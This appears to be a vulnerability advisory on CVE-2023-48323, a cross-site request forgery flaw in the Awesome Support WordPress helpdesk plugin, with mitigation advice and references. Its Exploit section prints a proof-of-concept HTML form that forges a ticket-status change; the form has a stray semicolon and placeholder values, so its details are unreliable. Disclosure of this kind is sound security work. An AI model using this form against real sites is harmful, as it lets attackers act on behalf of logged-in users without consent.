A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the Awesome Support – WordPress HelpDesk & Support Plugin, which could potentially enable an attacker to perform actions on behalf of the user without their consent. This vulnerability has been identified as CVE-2023-48323 and affects versions of the plugin up to and including version 6.1.4.
Background
Cross-Site Request Forgery (CSRF) is a type of security vulnerability that occurs when an attacker coerces an authenticated user into unintentionally performing actions on a web application they are currently logged into. This is achieved by supplying a malicious link or embedding the link in another site the user visits.
Vulnerability Details
The Awesome Support – WordPress HelpDesk & Support Plugin is a popular solution for enabling customer support within WordPress websites. Unfortunately, it has been discovered that the plugin is vulnerable to CSRF attacks due to inadequate security mechanisms. This vulnerability permits unauthorized actions to be performed on the application, such as creating, deleting, or modifying support tickets.
Exploit
The exploit for this vulnerability requires the attacker to send a specially crafted link to the victim, which triggers the CSRF attack once clicked. In this example, we will demonstrate the exploit by updating a support ticket's status.
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=awesome-support/tickets.php"; method="POST">
<input type="hidden" name="id" value="12" />
<input type="hidden" name="_wpnonce" value="attacker_nonce" />
<input type="hidden" name="status" value="closed" />
<input type="hidden" name="_referer" value="same_url_as_above" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>
The attacker sets the "_wpnonce" value to their own generated, unvalidated nonce, then tricks the victim to click the "Submit Request" button, which sends the POST request with malicious input. This results in the victim inadvertently changing the status of ticket ID 12 to "closed."
Mitigation
To mitigate this vulnerability, it is essential to update the Awesome Support – WordPress HelpDesk & Support Plugin to the latest version that addresses this issue. Additionally, ensure that the WordPress installation itself is up-to-date and that security best practices are maintained.
Original References
1. Awesome Support Team Awesome Support – WordPress HelpDesk & Support Plugin: https://getawesomesupport.com/
2. National Vulnerability Database (NVD), CVE-2023-48323: https://nvd.nist.gov/vuln/detail/CVE-2023-48323
3. OWASP Guide to Cross-Site Request Forgery (CSRF): https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
In summary, the CSRF vulnerability (CVE-2023-48323) in the Awesome Support – WordPress HelpDesk & Support Plugin allows attackers to request unauthorized actions within a web application, such as creating, deleting, or modifying support tickets. It is crucial to update your Awesome Support plugin and follow security best practices to protect your website.
Timeline
Published on: 11/30/2023 13:15:09 UTC
Last modified on: 12/05/2023 02:00:16 UTC